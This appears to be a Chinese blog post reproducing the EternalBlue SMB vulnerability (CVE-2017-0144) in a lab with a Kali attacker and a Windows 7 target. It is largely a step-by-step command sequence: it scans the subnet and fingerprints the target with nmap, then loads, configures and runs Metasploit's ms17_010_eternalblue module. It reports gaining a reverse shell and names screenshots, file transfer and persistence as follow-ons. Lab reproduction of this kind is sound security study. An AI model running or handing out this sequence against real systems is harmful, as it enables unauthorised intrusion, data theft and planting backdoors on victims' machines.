永恒之蓝漏洞(CVE-2017-0144)复现
永恒之蓝漏洞(CVE-2017-0144)复现
环境搭建
一台kali攻击机
一台windows7靶机
信息收集
ifconfig 查看kali的ip地址为192.168.125.25
使用nmap扫描192.168.125.0网段下存活的主机
nmap 192.168.125.25/24
判断靶机ip地址为192.168.125.151
nmap -O 192.168.125.151
判断靶机为Windows 7|2008|8.1
使用永恒之蓝进行攻击
msfconsole进入metasploit控制台
search ms17_010
这里使用exploit/windows/smb/ms17_010_eternalblue进行攻击
use exploit/windows/smb/ms17_010_eternalblue
使用永恒之蓝漏洞
show options
查看漏洞利用所需的基本设置
set RHOSTS 192.168.125.151
这里只用设置目标ip地址
run 执行攻击
已经成功反弹shell,可以执行截屏,文件上传下载,后门持久化等操作
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步